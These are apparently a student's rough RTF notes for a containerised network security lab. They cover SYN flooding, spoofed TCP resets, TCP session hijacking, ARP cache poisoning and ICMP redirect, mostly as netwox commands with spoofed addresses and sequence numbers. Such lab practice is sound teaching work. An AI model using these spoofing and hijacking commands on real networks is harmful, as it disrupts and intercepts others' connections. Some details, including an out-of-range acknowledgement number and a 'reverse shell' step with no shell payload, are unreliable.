{\rtf1\ansi\ansicpg1252\cocoartf2580
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 HelveticaNeue-Bold;\f1\fnil\fcharset0 Menlo-Regular;\f2\fnil\fcharset0 HelveticaNeue;
\f3\fswiss\fcharset0 Arial-BoldMT;\f4\froman\fcharset0 Times-Bold;\f5\fnil\fcharset0 Monaco;
\f6\fswiss\fcharset0 Helvetica;\f7\fswiss\fcharset0 Helvetica-Bold;\f8\froman\fcharset0 Times-Roman;
\f9\fmodern\fcharset0 Courier;\f10\fmodern\fcharset0 Courier-Bold;\f11\fnil\fcharset0 Menlo-Bold;
}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;\red255\green255\blue255;\red230\green230\blue230;
\red34\green45\blue53;\red242\green242\blue242;\red38\green38\blue38;\red33\green255\blue6;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;\cssrgb\c100000\c100000\c100000;\csgray\c92143;
\cssrgb\c17647\c23137\c27059;\cssrgb\c96078\c96078\c96078;\cssrgb\c20000\c20000\c20000;\cssrgb\c0\c97680\c0;}
{\*\listtable{\list\listtemplateid1\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid1\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid1}
{\list\listtemplateid2\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid101\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid2}
{\list\listtemplateid3\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid201\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid3}}
{\*\listoverridetable{\listoverride\listid1\listoverridecount0\ls1}{\listoverride\listid2\listoverridecount0\ls2}{\listoverride\listid3\listoverridecount0\ls3}}
\paperw11900\paperh16840\margl1440\margr1440\vieww11420\viewh14860\viewkind0
\deftab560
\pard\pardeftab560\sa40\partightenfactor0

\f0\b\fs32 \cf0 Getting started\
\pard\pardeftab560\pardirnatural\partightenfactor0
\ls1\ilvl0
\f1\b0\fs18 \cf0 {\listtext	\uc0\u8226 	}
\f2\fs26 Launch the lab VM.\
\ls1\ilvl0
\f1\fs18 {\listtext	\uc0\u8226 	}
\f2\fs26 On the lab VM, open one terminal window and run the following commands to start the LXC containers: \
\pard\pardeftab720\partightenfactor0
\cf0 \
\pard\pardeftab720\sl540\sa120\partightenfactor0

\fs36 \cf2 \cb3 \expnd0\expndtw0\kerning0
Tools\
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls2\ilvl0
\fs32 \cf2 \kerning1\expnd0\expndtw0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
wireshark - Sniffer and protocol analyzer\cb1 \
\ls2\ilvl0\cb3 \kerning1\expnd0\expndtw0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
tcpdump - Command-line based sniffer\cb1 \
\ls2\ilvl0\cb3 \kerning1\expnd0\expndtw0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
netwox - Tools to generate packets and spoof network traffic\cb1 \
\ls2\ilvl0\cb3 \kerning1\expnd0\expndtw0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
netcat (nc) - A tool for reading/writing network connections using TCP/UDP, which can be used for a simple client/server.\cb1 \
\pard\tx566\pardeftab560\pardirnatural\partightenfactor0

\fs26 \cf0 \kerning1\expnd0\expndtw0 \
\pard\pardeftab560\sa40\partightenfactor0

\f0\b\fs32 \cf0 LXC containers\
#Telent use to 1.1 and 1.2\
\pard\pardeftab560\slleading20\partightenfactor0

\f2\b0\fs26 \cf0 1)\
\cb4 lxc start attacker\cb1  \
\cb4 lxc start inside-host\cb1 \
\cb4 lxc start outside-host\cb1 \
\cb4 lxc start firewall\
\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\
lxc stop attacker \cb1 \
\cb4 lxc stop inside-host\cb1 \
\cb4 lxc stop outside-host\cb1 \
\cb4 lxc stop firewall\cb1 \
\cb4 \'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\cb1 \
\
#To start attacker\
\cb4 lxc start attacker\cb1  \uc0\u8232 #To stop attacker\
\cb4 lxc stop attacker \cb1 \
\
#To start attack inside\
\cb4 lxc start inside-host\cb1 \uc0\u8232 #To stop attack inside\
\cb4 lxc stop inside-host\cb1 \
\
#To start attack outside\
\cb4 lxc start outside-host\cb1 \uc0\u8232 #To stop attack outside\
\cb4 lxc stop outside-host\cb1 \
\
#To start attack firewall\
\cb4 lxc start firewall\cb1 \uc0\u8232 #To stop attack firewall\
\cb4 lxc stop firewall\cb1 \
\
#To see if you have attack or no\
sudo lxc-info -n attacker\
\

\f0\b 2) oppen 5 st terminal
\f2\b0 \
1-server\
Den f\'f6rsta terminalen\
2-
\f0\b attacker Terminal
\f2\b0 \
\cb4 lxc exec attacker /bin/bash\cb1 \
\
3-
\f0\b inside-host
\f2\b0  
\f0\b Terminal
\f2\b0 \
\cb4 lxc exec inside-host /bin/bash\cb1 \
\
4-
\f0\b outside-host Terminal
\f2\b0 \
\cb4 lxc exec outside-host /bin/bash\cb1 \
\
5-
\f0\b firewall
\f2\b0  
\f0\b Terminal
\f2\b0 \
\cb4 lxc exec firewall /bin/bash\cb1 \
\
\pard\pardeftab560\sa40\partightenfactor0

\f0\b\fs32 \cf0 SYN flooding attack\
\pard\pardeftab560\slleading20\partightenfactor0

\f2\b0\fs26 \cf0 3)\

\f0\b #Outside-host Terminal
\f2\b0 \
\cb4 ss -ltn\cb1 \
#Start a telnet service\
\cb4 service xinetd start\cb1 \
\
Check\
\cb4 ss -ltn\cb1 \
\
4)\

\f0\b #Firewall Terminal
\f2\b0 \
#Check what services are listening on TCP sockets\
#Add a default route to the attacker \
\cb4 ip route add default via 10.0.20.3\cb1 \
\
\
\
5)\

\f0\b #Attacker Terminal\

\f2\b0 #Disable routing\
\cb4 sysctl -w net.ipv4.ip_forward=0\cb1 \
\
\pard\pardeftab720\sa240\partightenfactor0

\f3\b\fs36 \cf2 \cb3 \expnd0\expndtw0\kerning0
#At this point, the containers are configured and you are ready to begin the attack. 
\f4 \cb1 \
\pard\pardeftab560\slleading20\partightenfactor0

\f2\b0\fs26 \cf0 \kerning1\expnd0\expndtw0 \
\
6)\

\f0\b #Attacker Terminal\
#netwox 76
\f2\b0 \
\pard\pardeftab560\slleading20\partightenfactor0

\f0\b \cf0 \cb4 netwox 76 -i 10.0.10.2 -p 23 -s raw
\f2\b0 \
\pard\pardeftab720\partightenfactor0

\f0\b\fs32 \cf2 \cb3 \expnd0\expndtw0\kerning0
Let the attack runs for five seconds\
Ctrl+C
\f2\b0\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 \
# 
\f0\b netstat -na | grep tcp
\f2\b0 \
7)\

\f0\b #outside-host Terminal\

\f2\b0 ss -tan\
\
8)\

\f0\b #inside-host Terminal
\f2\b0 \
telnet 10.0.10.2\
\
9)\

\f0\b #inside-host Terminal
\f2\b0 \
Ctrl-C\
\
10)\

\f0\b #outside-host Terminal
\f2\b0 \
sysctl -w net.ipv4.tcp_syncookies=0\
\
11)\

\f0\b #inside-host Terminal\
#
\f2\b0 try to telnet to the outside-host again\
telnet 10.0.10.2\
\
\
\pard\pardeftab560\sa40\partightenfactor0

\f0\b\fs32 \cf0 1.2 TCP rest attack\
\pard\pardeftab560\slleading20\partightenfactor0

\f2\b0\fs26 \cf0 \
\pard\pardeftab560\pardirnatural\partightenfactor0
\ls3\ilvl0\cf0 On the 
\f0\b lab VM
\f2\b0 , start wireshark capture on the lxc-int-br interface\
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 1)\

\f0\b #inside-host Terminal
\f2\b0 \

\f0\b USERNAME: ubuntu 
\f2\b0 \

\f0\b PASSWORD: ubuntu \

\f2\b0 #Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-107-generic x86_64)\
\
2)\

\f0\b #Wireshark\

\f2\b0 #start wireshark capture on the 
\f0\b lxc-int-br
\f2\b0 \
#study the 
\f0\b last TCP message
\f2\b0  and 
\f0\b mark this packet
\f2\b0 .\
#To see the actual sequence number \
#change the settings by right-click on the packet \
#select 
\f0\b Protocol Preferences 
\f2\b0 and uncheck 
\f0\b Relative sequence numbers
\f2\b0 .\
\
3)\
\

\f0\b #Attacker Terminal\
#netwox 40 
\f2\b0 to forge a TCP reset message 
\f0\b from the outside-host 
\f2\b0 to the 
\f0\b inside-host
\f2\b0 \
#tcp-dst 
\f5\fs18 \cf5 \cb6 \expnd0\expndtw0\kerning0
<DST-PORT>
\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
#tcp-seqnum 
\f5\fs18 \cf5 \cb6 \expnd0\expndtw0\kerning0
<SEQ_NO> \'94We need NEXT swq\'94
\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
#tcp-acknum 
\f5\fs18 \cf5 \cb6 \expnd0\expndtw0\kerning0
<ACK_NO>
\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
# -z  ACK flag\
#-B  RST flag\
\
\
#( ip.src == 10.0.10.2 && ip.dst == 10.0.20.2)\
\
netwox 40 --ip4-ttl 64 --ip4-src 
\f0\b 10.0.10.2 
\f2\b0 --ip4-dst 
\f0\b 10.0.20.2 
\f2\b0 --tcp-src
\f0\b  23
\f2\b0  --tcp-dst 
\f0\b 44180 
\f2\b0 --tcp-seqnum 
\f0\b 577294102 
\f2\b0 --tcp-acknum 
\f0\b 3986048095 
\f2\b0 -z -B 
\f5\fs18 \cf5 \cb6 \expnd0\expndtw0\kerning0
--spoofip raw\

\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
\
5)\
#To go back to 
\f0\b inside-host \

\f2\b0 #You should appear on the inside-hosts terminal:
\f0\b \
Connection closed by foreign host
\f2\b0 \
\
6)\

\f0\b #Wireshark\
#
\f2\b0 At this point, you should have 
\f0\b two packets marked
\f2\b0  on Wireshark.\
1.
\f0\b Stop the Wireshark capture.
\f2\b0 \
2.From Wireshark's 
\f0\b File
\f2\b0  menu, select 
\f0\b Export Specified Packets
\f2\b0 ...\
3.In the 
\f0\b Packet Range
\f2\b0  section, select 
\f0\b Marked packets only
\f2\b0 . \uc0\u8232 In the "
\f0\b File name:
\f2\b0 " box, type in 
\f0\b reset
\f2\b0  (all characters in small letters) \uc0\u8232 Then, click Sav\
\
#you should have a file called 
\f0\b reset.pcapng
\f2\b0  that contains two packets on the home directory of your lab VM\
#study the last TCP message and 
\f0\b mark this packet
\f2\b0 .\
\
You will submit this file as part of Task 1 submission after you complete the Task 1 assignment.\
\
\
\
 \
\pard\pardeftab560\sa40\partightenfactor0

\f0\b\fs32 \cf0 1.3 TCP session hijacking\
\pard\pardeftab560\slleading20\partightenfactor0

\f2\b0\fs26 \cf0 #We use 
\f0\b netcat
\f2\b0  \
\
1)\
# netcat server that is actively listening for a connection on the outside-host and use netcat on the inside-host to connect to the netcat server. \
\
# Then, you will use netwox tool number 40 to send a forge TCP packet from the attacker to the outside-host to hijack the netcat \
\

\f0\b #Wireshark
\f2\b0 \
On the 
\f0\b lab VM
\f2\b0 , restart 
\f0\b Wireshark
\f2\b0  capture on the 
\f0\b lxc-int-br 
\f2\b0 interface\
\
2)\

\f0\b #outside-host Terminal\
#
\f2\b0 start a netcat server that listens on port 9090\
netcat -l 10.0.10.2 9090\
\
3)\

\f0\b #inside-host Terminal\
#
\f2\b0 start a netcat connection to the outside-host \
netcat 10.0.10.2 9090\
\

\f0\b #Once the connection is established
\f2\b0 \
#you can 
\f0\b send a message
\f2\b0  from the 
\f0\b inside-host 
\f2\b0 to the 
\f0\b outside-host
\f2\b0 \
#By writing the message on the 
\f0\b inside-host
\f2\b0 \

\f0\b Test by writing \'94hello\'94 \
\

\f2\b0 4)\

\f0\b #Wireshark\
# mark the last TCP message
\f2\b0  that is related to the established netcat connection and answer the first question below.\
\
\
5)\
\

\f0\b #Attacker Terminal\
#netwox 40
\f2\b0 \
#netwox 40 to forge a TCP message to 
\f0\b the outside-host
\f2\b0  to hijack the netcat connection.\
#message : 
\f0\b HIJACK\
# newline\
#TCP window : 502\
#-l     : IP4 source\
#-m	   : IP4 destination\
#-o     : TCP source port\'96\
#-p     : TCP destination port\
#-q     : TCP seqnum \'94NEXT\'94\
#-r      : TCP acknum\
#-a     : raw\
#-E     : TCP window\
#-H     : TCP data on hexadecimal\
\
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 \cb4 netwox 40 -j 64 -l 10.0.20.2 -m 10.0.10.2  -o 46648 -p 9090 -q 2579069677 -r 1580655220 -a raw -E 502 -H 48494a41434b0a  -A -z
\f2\b0 \cb1 \
\
\pard\pardeftab720\partightenfactor0

\f6\fs32 \cf0 \cb3 \expnd0\expndtw0\kerning0
Once you successfully hijack the TCP connection, you should see the "HIJACK" message on the
\f7\b  outside-host
\f6\b0 ,
\f2\fs26 \cb1 \kerning1\expnd0\expndtw0 \
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 \
\

\f0\b #48494a41434b0a
\f2\b0 \

\f0\b #7
\f2\b0 \
\
\
\
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs18 \cf5 \cb6 \expnd0\expndtw0\kerning0
mkdir tcpip_task1\
mv reset.pcapng tcpip_task1 \
mv hijack.pcapng tcpip_task1 \
tar zcvpf tcpip_task1.tgz tcpip_task1\
./scripts/check_tcpip_task1.sh\
\pard\pardeftab560\slleading20\partightenfactor0

\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
\
http://www.unit-conversion.info/texttools/hexadecimal/ \
\
https://web.ecs.syr.edu/~wedu/Teaching/cis758/netw522/netwox-doc_html/tools/76.html \
\
https://web.ecs.syr.edu/~wedu/Teaching/cis758/netw522/netwox-doc_html/tools/40.html \
\
\
netwox 40 --ip4-ttl 64 --ip4-src 10.0.10.2 --ip4-dst 10.0.20.2 --tcp-dst 53 --tcp-seqnum 3009183565 --tcp-acknum 3123023023078 -z -B --spoofip raw\
\
\
\
https://www.linuxjournal.com/content/everything-you-need-know-about-linux-containers-part-ii-working-linux-containers-lxc\
\
https://www.youtube.com/watch?v=W2orAOATGgA&ab_channel=RicardoCalix \
\
\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\'97\
\
\pard\pardeftab560\slleading20\partightenfactor0

\f0\b\fs48 \cf0 Task2
\f2\b0\fs26 \
# 
\f8\fs24 \cf2 \cb3 \expnd0\expndtw0\kerning0
00:16:3e:fb:73:43\
\pard\pardeftab720\partightenfactor0

\f9\fs28 \cf7 \cb1 Eth0 10.0.20.1       00:16:3E:FB:73:43 (firewall)\
Eth1 10.0.20.3       00:16:3E:18:34:6F (attacker)\
Inside 10.0.20.2	    FF:FF:FF:FF:FF:FF\
\pard\pardeftab560\slleading20\partightenfactor0

\f2\fs26 \cf0 \kerning1\expnd0\expndtw0 \
#No 
\fs32 \cf2 \cb3 \expnd0\expndtw0\kerning0
responses
\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
\pard\pardeftab720\partightenfactor0

\f9\fs28 \cf7 \expnd0\expndtw0\kerning0
00:16:3E:73:f6:b0\
\pard\pardeftab720\partightenfactor0

\f2\fs26 \cf0 \kerning1\expnd0\expndtw0 \
\
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 \cb4 lxc start attacker\cb1  \
\cb4 lxc start inside-host\cb1 \
\cb4 lxc start outside-host\cb1 \
\cb4 lxc start firewall\
\
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 \cb1 \
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 \cb4 lxc exec attacker /bin/bash\cb1 \
\
\cb4 lxc exec inside-host /bin/bash\cb1 \
\
\cb4 lxc exec outside-host /bin/bash\cb1 \
\
\cb4 lxc exec firewall /bin/bash\cb1 \
\pard\pardeftab560\slleading20\partightenfactor0

\f0\b\fs36 \cf2 \cb3 \expnd0\expndtw0\kerning0
2.1 ARP cache poisoning attack
\f2\b0 \
\pard\pardeftab560\slleading20\partightenfactor0

\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
1) #
\f0\b\fs32 \cf2 \cb3 \expnd0\expndtw0\kerning0
inside Terminal\
\pard\pardeftab720\sl216\partightenfactor0

\f5\b0\fs24 \cf5 \cb8 ping 10.0.20.1
\fs18 \cb6 \
\pard\pardeftab560\slleading20\partightenfactor0

\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
2) #NEW Terminal-
\f0\b\fs32 \cf2 \cb3 \expnd0\expndtw0\kerning0
inside\
\pard\pardeftab560\slleading20\partightenfactor0

\f2\b0\fs26 \cf0 \cb8 \kerning1\expnd0\expndtw0 lxc exec inside-host /bin/bash
\f0\b\fs32 \cf2 \cb3 \expnd0\expndtw0\kerning0
\
\pard\pardeftab720\sl216\partightenfactor0

\f5\b0\fs24 \cf5 \cb8 ip neigh\cb6 \
\pard\pardeftab560\slleading20\partightenfactor0

\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
3) 
\fs32 \cf2 \cb3 \expnd0\expndtw0\kerning0
start Wireshark and capture packets on the internal bridge: lxc-int-br\
\
4) 
\f0\b\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 #Attacker Terminal\
#
\f2\b0\fs32 \cf2 \cb3 \expnd0\expndtw0\kerning0
\'a0forge a broadcast ARP request from the recipient's IP address to the victim's IP address
\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs24 \cf5 \cb8 \expnd0\expndtw0\kerning0
sysctl -w net.ipv4.ip_forward=0
\fs18 \cb6 \
\pard\pardeftab560\slleading20\partightenfactor0

\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
#
\fs32 \cf2 \cb3 \expnd0\expndtw0\kerning0
observe the output of the ping command on the first connection to the inside-host to see if and how long the traffic gets redirected to the attacker.\'a0\
\pard\pardeftab560\slleading20\partightenfactor0

\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
#
\f5\fs18 \cf5 \cb6 \expnd0\expndtw0\kerning0
--eth-dst.  
\f8\fs24 \cf2 \cb3 Ethernet dst    ff:ff:ff:ff:ff:ff
\f5\fs18 \cf5 \cb6 \
\pard\pardeftab560\slleading20\partightenfactor0

\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 #
\f5\fs18 \cf5 \cb6 \expnd0\expndtw0\kerning0
--arp-ipsrc 
\f8\fs24 \cf2 \cb3 ARP ipsrc.     10.0.20.1
\f5\fs18 \cf5 \cb6 \

\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 #
\f5\fs18 \cf5 \cb6 \expnd0\expndtw0\kerning0
--arp-ipdst 
\f8\fs24 \cf2 \cb3 ARP ipdst.     10.0.20.2
\f5\fs18 \cf5 \cb6 \

\f2\fs26 \cf0 \cb1 \kerning1\expnd0\expndtw0 \
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs24 \cf5 \cb8 \expnd0\expndtw0\kerning0
netwox 33 --eth-dst 
\f4\b \cf2  ff:ff:ff:ff:ff:ff
\f5\b0 \cf5  --arp-ipsrc 
\f4\b \cf2 10.0.20.1
\f5\b0 \cf5   --arp-ipdst 
\f4\b \cf2 10.0.20.2
\f8\b0 \cb3 \
\
\
\
5) 
\f2\fs32 Stop the capture on Wireshark.\
\pard\pardeftab720\partightenfactor0
\cf2 go to the forged broadcast ARP request that was sent by the attacker and mark this packet as well as the
\f0\b  next 2 packets.
\f2\b0 \
Export these three packets and save them to a file named:\'a0
\f10\b arp.pcapng
\f2\b0 . You will submit this file as part of Task 2 submission.
\f8\fs24 \
\pard\pardeftab720\sl216\partightenfactor0
\cf2 \

\f4\b\fs28 6) Attacker Terminal 
\f8\b0\fs24 \
\pard\pardeftab720\sl216\partightenfactor0

\f5 \cf5 \cb8 netwox 33 --eth-dst 
\f4\b \cf2  ff:ff:ff:ff:ff:ff
\f5\b0 \cf5  --arp-ipsrc 
\f4\b \cf2 10.0.20.1
\f5\b0 \cf5   --arp-ipdst 
\f4\b \cf2 10.0.20.2\cb3 \
\pard\pardeftab720\sl216\partightenfactor0

\f8\b0 \cf2 \

\f4\b 7) New inside Terminal
\f8\b0 \
#and look at 
\f4\b ip neigh (inside-Terminal)\
\pard\pardeftab560\slleading20\partightenfactor0

\f2\b0\fs26 \cf0 \cb4 \kerning1\expnd0\expndtw0 lxc exec inside-host /bin/bash\

\f4\b\fs24 \cf2 \cb3 \expnd0\expndtw0\kerning0
\
\pard\pardeftab720\sl216\partightenfactor0

\f8\b0 \cf2 \cb8 ip neigh\cb3 \
\
\
8)\
\pard\pardeftab720\partightenfactor0

\f2\fs32 \cf2 #Stop ping on the first connection to the inside-host\
\pard\pardeftab720\partightenfactor0

\f10\b \cf2 Ctrl-C\
\pard\pardeftab720\partightenfactor0

\f8\b0\fs24 \cf2 \
\pard\pardeftab720\sl648\sa120\partightenfactor0

\f0\b\fs43\fsmilli21600 \cf2 2.2 ICMP redirect attack
\f2\b0 \
\

\f0\b 1) first inside Terminal
\f2\b0 \
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs24 \cf5 \cb8 sysctl -w net.ipv4.ip_forward=0
\fs18 \cb6 \
\pard\pardeftab720\sl648\sa120\partightenfactor0

\f2\fs43\fsmilli21600 \cf2 \cb3 \

\f0\b 2) first inside Terminal
\f2\b0 \
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs24 \cf5 \cb8 ping 10.0.10.2
\fs18 \cb6 \
\pard\pardeftab720\sl216\partightenfactor0

\f2\fs43\fsmilli21600 \cf2 \cb3 \

\f0\b 3) 
\fs32 second inside Terminal
\f2\b0 \
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs24 \cf5 \cb8 ip route get 10.0.10.2\cb6 \
\pard\pardeftab720\sl216\partightenfactor0

\f2\fs43\fsmilli21600 \cf2 \cb3 \
4)
\fs32 save this information to a file named\'a0
\f9 redirect1.txt
\f1\fs29\fsmilli14667 \
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs24 \cf5 \cb8 ip route get 10.0.10.2 > redirect1.txt 
\fs18 \cb6 \
\pard\tx566\pardeftab720\sa240\partightenfactor0

\f1\fs29\fsmilli14667 \cf2 \cb3 \

\f11\b 5) Start Wireshark on the lxc-in-br
\f1\b0 \
\

\f11\b 6) Attacker Terminal
\f1\b0 \
#
\f2\fs32 netwox 86 command to forge ICMP redirect messages from the original gateway (i.e., the firewall) to a new gateway (i.e., the attacker).
\f1\fs29\fsmilli14667 \
10.0.20.1\
10.0.20.3\
dst host 10.0.10.2\
\
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs24 \cf5 \cb8 netwox 86 --spoofip raw --src-ip 10.0.20.1 --gw 10.0.20.3 --filter \'94dst host 10.0.10.2\'94
\fs18 \cb6 \
\pard\tx566\pardeftab720\sa240\partightenfactor0

\f1\fs29\fsmilli14667 \cf2 \cb3 \

\f11\b 7)New attacker-Terminal
\f1\b0 \
\pard\pardeftab720\partightenfactor0

\f2\fs32 \cf2 #pen a new terminal and make a second connection to the
\f0\b \'a0
\f2\b0 attacker and use the netwox 33 command for the ARP cache poisoning.
\f1\fs29\fsmilli14667 \
\pard\pardeftab560\slleading20\partightenfactor0

\f2\fs26 \cf0 \cb8 \kerning1\expnd0\expndtw0 lxc exec attacker /bin/bash
\f1\fs29\fsmilli14667 \cf2 \cb3 \expnd0\expndtw0\kerning0
\
\pard\tx566\pardeftab720\sa240\partightenfactor0
\cf2 \
#byta till new hacker\
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs24 \cf5 \cb8 netwox 33 --eth-dst 
\f4\b \cf2  ff:ff:ff:ff:ff:ff
\f5\b0 \cf5  --arp-ipsrc 
\f4\b \cf2 10.0.20.1
\f5\b0 \cf5   --arp-ipdst 
\f4\b \cf2 10.0.20.3
\f1\b0\fs29\fsmilli14667 \cb3 \
\pard\tx566\pardeftab720\sa240\partightenfactor0
\cf2 \
\pard\tx566\pardeftab720\sa240\partightenfactor0

\f4\b\fs24 \cf2 \cb1 8) second  inside Terminal\
\pard\pardeftab720\partightenfactor0

\f5\b0 \cf5 \cb8 ip route get 10.0.10.2\cb6 \
\pard\pardeftab720\partightenfactor0

\f8 \cf2 \cb1 \
\pard\pardeftab720\sl216\partightenfactor0

\f5 \cf5 \cb8 ip route get 10.0.10.2 > redirect2.txt 
\fs18 \cb6 \
\pard\tx566\pardeftab720\sa240\partightenfactor0

\f8\fs24 \cf2 \cb1 \
9)\
\pard\pardeftab720\partightenfactor0

\f2\fs32 \cf2 \cb3 #Stop the capture on Wireshark.\'a0go to the forged broadcast ARP request that was #sent by the attacker and mark this packet as well as the 
\f0\b next 3 packets
\f2\b0 \
#Export these four packets and save them to a file named:\'a0
\f10\b redirect.pcapng
\f8\b0\fs24 \cb1 \
\pard\pardeftab720\sl216\partightenfactor0
\cf2 \cb3 \
10) first Attacker Terminal \
\pard\pardeftab720\partightenfactor0

\f10\b\fs32 \cf2 \cb8 Ctrl-C
\f2\b0 \cb3 .\
\
11) second \'a0
\f0\b inside-host Terminal\
\pard\pardeftab720\sl216\partightenfactor0

\f5\b0\fs24 \cf5 \cb8 ip route flush cache
\fs18 \cb6 \
\pard\pardeftab720\partightenfactor0

\f2\fs32 \cf2 \cb3 \
\
12) first 
\f0\b inside-host Terminal\
\pard\pardeftab720\partightenfactor0
\cf2 \cb8 Ctrl-C\cb3 \
\pard\pardeftab720\partightenfactor0

\f8\b0\fs24 \cf2 \
\pard\pardeftab720\sl216\partightenfactor0
\cf2 \
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs18 \cf5 \cb6  https://web.ecs.syr.edu/~wedu/Teaching/cis758/netw522/netwox-doc_html/tools/86.html\
\
https://web.ecs.syr.edu/~wedu/Teaching/cis758/netw522/netwox-doc_html/tools/33.html \
\
https://www.codetd.com/en/article/10387984\
\
\
\
\pard\pardeftab720\sl648\sa120\partightenfactor0

\f2\fs43\fsmilli21600 \cf2 \cb3 2.3 TCP session hijacking + reverse shell access\
1) first attacker Terminal \
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs18 \cf5 \cb6 netcat -lnv 10.0.20.3 9090\
\
\pard\pardeftab720\sl648\sa120\partightenfactor0

\f2\fs43\fsmilli21600 \cf2 \cb3 2) Start Wireshark 
\fs32 lxc-int-br
\fs43\fsmilli21600 \
3) onside Terminal\
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs18 \cf5 \cb6 service xinetd restart\
\pard\pardeftab720\sl648\sa120\partightenfactor0

\f2\fs43\fsmilli21600 \cf2 \cb3 3) first inside Terminal\
telnet 10.0.10.2\
\pard\pardeftab720\partightenfactor0

\f0\b\fs32 \cf2 USERNAME: ubuntu
\f2\b0 \

\f0\b PASSWORD: ubuntu\
\
4)
\f2\b0  attacker Terminal\
#use netwox 40 to forge a TCP message to the outside-host to hijack the telnet connection and set up a reverse shell.
\fs43\fsmilli21600 \
\
\pard\pardeftab560\slleading20\partightenfactor0

\f0\b\fs26 \cf0 \cb4 \kerning1\expnd0\expndtw0 netwox 40 -j 64 -l 10.0.20.2 -m 10.0.10.2  -o 36762 -p 23 -q 916512356 -r 2431331476 -a raw -E 502 -H 48494a41434b0a  -A -z\
\pard\pardeftab720\partightenfactor0

\fs32 \cf2 \cb3 \expnd0\expndtw0\kerning0
4)
\f2\b0  attacker Terminal\
Exit \
\
\
5) Use the other connection to the inside-host to kill the telnet session with the command:\
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs18 \cf5 \cb6 killall telnet\
\
\
\
\
\
\
\
\
\
\
\
\pard\pardeftab720\partightenfactor0

\f2\fs32 \cf2 \cb3 Recall that you have saved two files (
\f9 redirect1.txt
\f2 \'a0and\'a0
\f9 redirect2.txt
\f2 )\
\pard\pardeftab720\sl216\partightenfactor0

\f5\fs18 \cf5 \cb6 lxc file pull inside-host/root/redirect1.txt .\cb1 \
\cb6 lxc file pull inside-host/root/redirect2.txt .\
\
\
 mkdir tcpip_task2\
 mv arp.pcapng tcpip_task2 \cb1 \
\cb6  mv redirect1.txt tcpip_task2 \cb1 \
\cb6  mv redirect2.txt tcpip_task2 \cb1 \
\cb6  mv redirect.pcapng tcpip_task2 \cb1 \
\cb6  mv shell.pcapng tcpip_task2 \
\
tar zcvpf tcpip_task2.tgz tcpip_task2\
\
./scripts/check_tcpip_task2.sh\
}